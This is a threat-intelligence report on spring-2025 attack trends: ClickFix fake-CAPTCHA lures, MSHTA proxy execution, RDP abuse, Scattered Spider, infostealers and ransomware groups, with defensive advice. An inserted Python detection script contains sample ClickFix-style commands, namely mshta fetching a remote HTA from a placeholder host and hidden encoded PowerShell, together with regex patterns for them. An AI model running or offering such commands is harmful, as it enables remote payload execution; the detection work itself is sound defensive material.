Key Points

“ClickFix” tactics have fueled the surge in malware like “Lumma” and “SectopRAT,” using trusted tools like MSHTA to bypass defenses and deliver payloads.

Social engineering tactics like IT help-desk impersonation have pushed RDP ahead of internal spearphishing as the top initial access method.

Following the shutdown of “RansomHub,” affiliates have migrated to “Qilin,” driving an explosive 148% jump in activity.

“Scattered Spider” has returned to the ransomware game, combining social engineering, cloud persistence, and on-premises exploitation to target high-value users like CFOs, leveraging tools like RDP and Secure Shell (SSH) for stealthy attacks.


In our latest quarterly analysis (March–May 2025, the “reporting period”), ReliaQuest analyzed new and prevalent attacker techniques, malware trends, and ransomware group activity. These findings reveal how adversaries are refining their tactics, techniques, and procedures (TTPs); adapting to defenses; and exploiting vulnerabilities to infiltrate organizations.

This report examines emerging patterns through real-world attack methods, highlighting how attackers leverage trusted tools and target human weaknesses to achieve their goals. With insights relevant across industries, it provides actionable recommendations to help organizations strengthen defenses, anticipate threats, and stay ahead of increasingly sophisticated adversaries.

One standout trend this quarter is the widespread use of ClickFix—a social engineering technique that tricks users into pasting malicious commands into tools like PowerShell or the Windows Run prompt. Disguised as a “solution” to issues like fake CAPTCHAs or Windows updates, ClickFix preys on user trust and curiosity, enabling attackers to deliver malware and gain initial access with alarming ease.

As you read on, you’ll find actionable strategies to counter tactics like ClickFix, stay ahead of the latest attack trends, and build resilience in today’s evolving threat environment.

Top Tactics Targeting Enterprise Environments

In this section, we examine select MITRE tactics and techniques to reveal emerging attacker trends and the factors fueling their popularity.

Social Engineering Powers the First Step in Attacks

Figure 1: Top MITRE ATT&CK initial access techniques in true-positive incidents (% of total) during reporting period

Phishing-based tactics accounted for over half of initial access customer incidents, while drive-by compromises rose by 10% compared to the previous reporting period. Social engineering played a pivotal role in the success of these top tactics.

Techniques like ClickFix (see case study below) were central to drive-by downloads, typically delivered via phishing. Widely available phishing kits—pre-made tools that enable convincing phishing attacks—have drastically lowered the barrier to entry for attackers, allowing them to scale mass email delivery effortlessly. This ease of use ensures phishing remains among the top tactics time and time again.

External remote resources dropped from third to fourth place as attackers increasingly exploit user mistakes rather than technical vulnerabilities. This shift is likely driven by the simplicity, success rate, and universal applicability of social engineering campaigns like ClickFix.

For defenders, the rise in social engineering highlights the importance of addressing the human element in cybersecurity. Attackers are using trust, curiosity, and a lack of awareness to their advantage. To counter these threats, organizations must prioritize user education, implement phishing-resistant authentication methods, and deploy robust email security solutions to reduce risk effectively.

In May 2025, ReliaQuest identified a new ClickFix campaign that involved a fraudulent CAPTCHA to deceive users into executing a malicious PowerShell command. The fake CAPTCHA prompt encouraged users to copy and run obfuscated PowerShell commands, bypassing browser protections. These commands redirected users to a scareware page designed to mimic a Windows Defender alert, complete with a fake antivirus scan and a fraudulent Microsoft support number.

The organization’s endpoint detection and response (EDR) tool successfully blocked the malicious command, preventing the attackers from establishing remote access. Swift detection and response disrupted the attack chain before any further compromise could occur.

MSHTA’s Role in 33% of Defense Evasion Attacks

Figure 2: Top MITRE ATT&CK defense evasion techniques in true-positive incidents (% of total) during reporting period

Proxy execution with MSHTA, a native Windows binary for running HTML application files, has surged in popularity, rising from 3.1% a year ago to 33% of defense evasion incidents during this reporting period.

Threat actors take advantage of this legitimate tool by convincing users to copy and paste malicious commands into a terminal and press Enter. MSHTA allows attackers to bypass traditional security controls designed to detect file-based delivery methods, such as phishing attachments.

In the previous reporting period, the rise in MSHTA abuse was largely attributed to “ClearFake,” a JavaScript framework that used deceptive CAPTCHAs to convince users to execute malicious MSHTA commands.

ClearFake’s early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defense evasion tactics. Recently, other ClickFix adopters have fueled MSHTA’s current surge, leveraging broader social engineering tactics to bypass defenses more effectively.

Meanwhile, file deletion has rapidly gained momentum, climbing from eighth to third place in just one year. Once mainly used to cover tracks, this tactic now serves as a method for persistence and control. By removing key files, attackers can disable forensic investigations, disrupt incident response efforts, and ensure their presence remains hidden. This approach not only buys attackers more time to exfiltrate sensitive data but also prevents credential rotations, allowing them to maintain access and even resell compromised environments to other threat actors.

This shift in attacker behavior reflects a wider trend of using trusted system binaries and advanced evasion tactics. As such, organizations must adopt robust detection strategies to identify the misuse of legitimate tools to prevent attackers from operating undetected.
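To make the detection recommendation above concrete, here is an added example (not ReliaQuest's tooling or any product's rule set) that triages constructed process-creation events for the two patterns described on this page: MSHTA launched with a remote URL, and PowerShell launched with hidden/encoded/bypass flags from an interactive parent such as explorer.exe. The event shape, the explorer.exe parent heuristic (the Run prompt and double-clicks spawn children under explorer.exe), and the sample command lines are assumptions for this example; the base64 argument is a placeholder.

```python
import re

# Constructed sample events in a simplified Sysmon/EDR-like shape (not real
# telemetry). Event 0 and 1 model ClickFix-style pastes; 2 and 3 are benign.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://captcha-check.example.invalid/verify.hta"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -enc <REDACTED_BASE64_PLACEHOLDER>"},
    {"parent": r"C:\Program Files\Corp\deploy.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Corp\ui\panel.hta"},   # local HTA, no URL
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Heuristics (assumptions for this example, not rules from the report).
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
HIDDEN_RE = re.compile(r"(?:^|\s)-(?:w|win|windowstyle)\s+hidden\b", re.IGNORECASE)
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+\S+", re.IGNORECASE)
BYPASS_RE = re.compile(r"(?:^|\s)-(?:ep|executionpolicy)\s+bypass\b", re.IGNORECASE)
INTERACTIVE_PARENTS = {"explorer.exe"}  # where a pasted Run-prompt command lands
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> list:
    """Return the list of reasons an event looks like ClickFix/MSHTA abuse
    (empty list means nothing suspicious under these heuristics)."""
    image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    reasons = []
    if image == "mshta.exe" and URL_RE.search(cmd):
        reasons.append("mshta executing remote content")
    if image in POWERSHELL:
        for label, rx in (("hidden window", HIDDEN_RE),
                          ("encoded command", ENCODED_RE),
                          ("execution policy bypass", BYPASS_RE)):
            if rx.search(cmd):
                reasons.append(f"powershell {label}")
    # Only escalate on the parent when the child already looked suspicious,
    # otherwise every explorer.exe child would be flagged.
    if reasons and parent in INTERACTIVE_PARENTS:
        reasons.append(f"launched from {parent} (consistent with a pasted command)")
    return reasons


def triage(events: list) -> list:
    """Return (index, reasons) for every event that scored at least one reason."""
    findings = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if reasons:
            findings.append((i, reasons))
    return findings


if __name__ == "__main__":
    for idx, why in triage(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(why))
```

Against the constructed sample, events 0 and 1 are flagged and events 2 and 3 are not; tune the parent set and flag patterns to the telemetry your EDR actually emits.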

RDP Emerges as the Top Choice for Lateral Movement

Figure 3: Top MITRE ATT&CK lateral movement techniques in true-positive incidents (% of total) during reporting period

Originally designed as a legitimate tool for IT teams to provide remote support, RDP’s widespread presence on Windows systems has made it the go-to method for attackers. This trend is almost certainly linked to the rise of the Microsoft Teams social engineering tactic, where attackers impersonate IT help desks and persuade users to download RDP tools to connect remotely to their host.

The shift away from tactics like internal spearphishing suggests attackers are favoring techniques that require less user interaction and offer more direct access to internal systems. RDP provides predictable, stealthy access, especially when paired with stolen or purchased credentials.

The growing use of RDP as an attack vector highlights a critical vulnerability: the combination of human error and reliance on remote access tools. To mitigate these risks, businesses must prioritize employee training, enforce strict access controls, and monitor remote access activity to prevent breaches and data exposure.

Step Up Your Defenses

  • Disable Windows Run Prompt: Restrict access to the Windows Run prompt for non-administrative users to prevent attackers from using it to execute malicious commands, including those seen in ClickFix campaigns.

  • Prevent Unauthorized RDP Tools: Enforce application control policies to prevent the installation or execution of unauthorized RDP tools like QuickAssist.

  • Strengthen Defenses Against Drive-By Compromise: Implement web filtering solutions to block access to malicious websites used in drive-by compromise attacks. Regularly update and patch web browsers, plugins, and software to minimize vulnerabilities. Train staff to recognize and avoid suspicious links or pop-ups, and enforce policies that restrict the use of outdated or unsupported software that attackers often exploit.

ReliaQuest Investigates: Scattered Spider’s Comeback

After a five-month hiatus, Scattered Spider reemerged in April 2025, linked to a series of attacks on UK retail organizations. While the “DragonForce” ransomware group claimed responsibility, it’s believed that Scattered Spider facilitated initial access for these incidents, highly likely signaling a strategic partnership to regain momentum.

Our research into the group’s recent TTPs helps organizations understand how to protect themselves from becoming Scattered Spider’s next target.

Precision Targeting Through Social Engineering

Scattered Spider relies on carefully orchestrated social engineering to compromise organizations. CFOs are a primary focus, with attackers gathering personal and professional data online to convincingly impersonate them. In some cases, the group has exploited forgotten username portals to collect additional details, allowing them to manipulate help-desk and IT teams into resetting credentials and bypassing multifactor authentication (MFA). This meticulous preparation makes Scattered Spider’s methods alarmingly effective, allowing the group to infiltrate systems and escalate privileges with ease.

Figure 4: Example forgotten username portal used by Scattered Spider

Stealth Tactics to Operate Undetected

Inside enterprise environments, Scattered Spider gathers intelligence by accessing SharePoint documents while deleting key email indicators, such as MFA reset notifications and new device alerts, to conceal its activity. By operating stealthily for extended periods, the group significantly increases its chances of success.

On-Premises Exploitation Through Virtualization

Scattered Spider employs advanced on-premises techniques like RDP and Secure Shell (SSH) protocols for lateral movement. It also leverages virtualization platforms like Azure and ESXi virtual machines (VMs) to evade traditional defenses and flexibly execute attacks. These tactics enable the group to blend malicious activity into legitimate processes, making detection by conventional security measures far more difficult.

Scattered Spider’s success lies in its ability to combine social engineering precision, persistence in cloud environments, and on-premises technical expertise. These TTPs allow the group to achieve initial access, maintain control, and operate stealthily, making it difficult for organizations to detect and remediate the group's activity in the early stages of an attack.

To counter these threats, organizations must prioritize enhanced identity verification, behavioral detection, and monitoring for unusual activity across both cloud and on-premises environments. Additionally, conducting external risk assessments for VIP information, such as executive profiles and publicly available data, can help identify vulnerabilities that attackers may exploit. These insights can inform the protection of company accessibility systems, reducing the risk of targeted attacks by groups like Scattered Spider.

Step Up Your Defenses

  • Implement ESXi Smart-Card Authentication: To limit the impact of compromised credentials or MFA, replace password-based vSphere authentication with smart card and PIN access to restrict entry to the ESXi environment.

  • Strengthen Social Engineering Defenses: Introduce video calls with ID verification and verified phone number callbacks for multistep verification; and conduct regular testing and employee training to help detect and deter attacks.

  • Restrict SharePoint Permissions: Limit access to sensitive files in SharePoint to only essential personnel, reducing the risk of attackers exploiting compromised accounts to access critical information.

ClickFix Fuels the Rise of SectopRAT Malware

Figure 5: Top three malware in true-positive incidents (% of total) during reporting period

Activity involving “SectopRAT,” a .NET-based remote access trojan (RAT), spiked during this reporting period, fueled by two highly effective campaigns. Attackers leveraged ClickFix and a malvertising campaign using fake Google ads to distribute malicious Google Chrome installers hiding the malware. Both methods allowed attackers to exfiltrate credentials and establish backdoors for further exploitation, making SectopRAT a rising threat.

While SectopRAT has gained prominence due to its high success rates and innovative delivery techniques, previous heavy hitters—ClearFake and SocGholish—have fallen behind. However, this shift likely reflects the greater effectiveness of newer campaigns leveraging advanced tactics, rather than a slowdown in activity.

Lumma’s Resilience After Takedown

In May 2025, law enforcement dismantled “Lumma’s” infrastructure, suspending and blocking around 2,300 malicious domains. Despite this, Lumma’s operations remain active: Developers claim their systems are still functional, automated Telegram posts continue to advertise new logs for sale, and listings for Lumma logs on “Russian Market,” a popular cybercriminal marketplace, are regularly updated.

Although Lumma’s activity will likely decline over the coming months as the impact of the takedown unfolds, the group could regain traction over time. As attention around the takedown fades, attackers may return to this familiar, well-established tool.

Step Up Your Defenses

  • Disable Password Saving in Browsers: Enforce policies to prevent storing passwords in web browsers, as infostealers often target browser-stored credentials. Conduct regular compliance audits to ensure this measure is consistently applied.

  • Reduce Session Cookie Timeouts: Set shorter session cookie timeouts to minimize the risk of session hijacking. This reduces an attacker’s access window and improves security by requiring more frequent re-authentication.

  • Log PowerShell Events: Use Group Policy to enable PowerShell logging, including script block logging and transcription. This helps detect malicious PowerShell commands from copy-paste malware.

Qilin Surges 148% Amid Ransomware Shakeup

Figure 6: Number of organizations listed on ransomware data-leak sites, by site, during reporting period

The ransomware landscape has been unusually chaotic, with major groups like “RansomHub” disbanding and others being absorbed. During this reporting period, Qilin’s activity skyrocketed by 148%, while “Play” and “Safepay” saw increases of 116% and 266%, respectively. These spikes are likely tied to RansomHub’s shutdown on April 1, 2025, as former affiliates likely migrated to other ransomware-as-a-service (RaaS) platforms, including Qilin.

This trend reflects a broader shift: While the number of active ransomware groups has dropped by nearly 30%, their affiliates are joining emerging or established RaaS platforms. These affiliates bring experience and expertise, fueling the growth of newer RaaS platforms.

With major ransomware groups like RansomHub gone, RaaS operators are vying to capitalize on the influx of affiliates searching for new platforms. To attract this talent, we’ll likely see RaaS platforms introduce innovative capabilities or revise profit-sharing models. This competition is expected to create a more fragmented yet increasingly sophisticated ransomware ecosystem, posing even greater challenges for defenders.

Figure 7: Organizations listed on ransomware data-leak sites, by sector, during the reporting period

Ransomware victim data reveals notable changes this reporting period, with construction emerging as the only sector to experience an increase in attacks—rising by 15%. This surge likely reflects opportunistic targeting rather than a strategic shift, as attackers exploit the construction industry’s weaker cyber defenses. The sector's growing reliance on interconnected operational technology systems, such as project management tools, supply-chain coordination, and on-site equipment monitoring, creates vulnerabilities that adversaries can leverage to disrupt workflows. Construction organizations may feel compelled to pay ransoms quickly to avoid costly downtime and operational delays, making them attractive targets.

In contrast, the retail trade sector saw a 62% drop in victim count, returning to usual targeting levels. This sharp decline follows an unusual surge in the previous reporting period, driven almost entirely by the “CL0P” ransomware Cleo campaign, which disproportionately targeted retail trade organizations for their vast customer data and payment systems. With the Cleo campaign no longer active, attackers appear to have shifted their attention, reinforcing the opportunistic nature of ransomware operations.

For defenders, the rise in construction targeting highlights the urgent need to address the industry’s low cybersecurity maturity. Strengthening defenses, securing operational technologies, and implementing robust incident response plans are critical to minimizing future risks. This trend is a reminder that adversaries will continue to prey on industries they perceive as easier targets.

Step Up Your Defenses

  • Restrict External Communication: Disable external chats in Microsoft Teams to block phishing attempts from outside attackers. For essential external communication, use an allowlist to restrict interactions to trusted domains only.

  • Use Risk-Based Authentication: Adjust access requirements dynamically based on user behavior, device, and location. Flag unusual activity, such as logins from unfamiliar locations, to stop breaches early.

  • Protect Against AiTM Phishing: Secure high-risk accounts with Fast IDentity Online (FIDO), which resists adversary-in-the-middle (AiTM) attacks. Train employees to recognize phishing attempts from both internal and external sources.

Key Takeaways and What’s Next

The ransomware landscape is undergoing a significant transformation as affiliates migrate from disbanded groups like RansomHub to emerging RaaS platforms like Qilin, Play, and Safepay. This shift is reshaping the ecosystem, with Qilin alone seeing a staggering 148% surge in activity over the past three months. As RaaS operators compete to attract affiliates with new capabilities and revised profit-sharing models, we can expect this trend to continue.

ClickFix has emerged as a game-changing initial access technique, capitalizing on social engineering to exploit user trust and bypass defenses. By enabling attackers to deliver payloads through trusted tools like PowerShell and Windows Run, ClickFix is driving the success of campaigns like SectopRAT.

These developments signal a critical need for organizations to strengthen defenses, restrict access to trusted tools, and enhance user awareness to counter the growing sophistication of attackers. Looking ahead, three key threats stand out:

ClickFix’s Expansion Among Ransomware Groups: ClickFix’s ability to evade detection by using trusted tools like MSHTA makes it a highly appealing technique for ransomware operators. Currently used in malware campaigns, ClickFix has proven highly effective at bypassing traditional defenses such as email filters and endpoint protection. Given its success, we anticipate that 30% of RaaS affiliates will integrate this technique in the short term, streamlining operations and scaling their campaigns.

Scattered Spider’s Growing Web: Scattered Spider remains a formidable threat, using stolen personal data and precise social engineering to bypass MFA and compromise high-value targets like CFOs. Looking forward, the group is likely to embrace technologies like deepfakes, using AI-generated voice and video to convincingly impersonate trusted individuals. This evolution would amplify risks across industries, broaden their target base, and make detection even more challenging.

Acreed Steps Up to the Plate: Our analysis of Russian Market logs shows that “Acreed” infostealing malware is rapidly gaining traction. By Q1 2025, Acreed had surpassed more established infostealers, ranking second only to Lumma and cementing itself as a major threat. Its ability to provide unique insights into the permissions of compromised users may allow attackers to sell these accounts at higher prices on criminal marketplaces like Russian Market, making it an attractive option for threat actors. As Lumma affiliates transition to new malware-as-a-service (MaaS) platforms, it’s highly likely Acreed will continue to grow in popularity.

As attackers refine their strategies, the pressure on defenders will only grow. To stay ahead in this shifting landscape, organizations must act on the recommendations in this report, including deploying advanced detection capabilities, improving user education, and securing both cloud and on-premises environments. Proactive measures like these are critical to countering the growing sophistication of today’s threats.